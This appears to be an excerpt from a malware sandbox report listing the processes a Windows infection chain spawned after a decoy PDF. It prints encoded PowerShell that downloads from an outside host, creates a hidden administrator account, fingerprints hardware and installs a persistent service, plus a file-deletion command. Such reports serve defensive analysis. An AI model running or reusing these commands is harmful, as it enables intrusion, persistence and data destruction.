JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4364.tmp" "c:\Users\user\AppData\Local\Temp\qlxhihga\CSCB3BD9BA87EAD4F1291288FCEAEB15417.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\Job Description.pdf"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG	Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
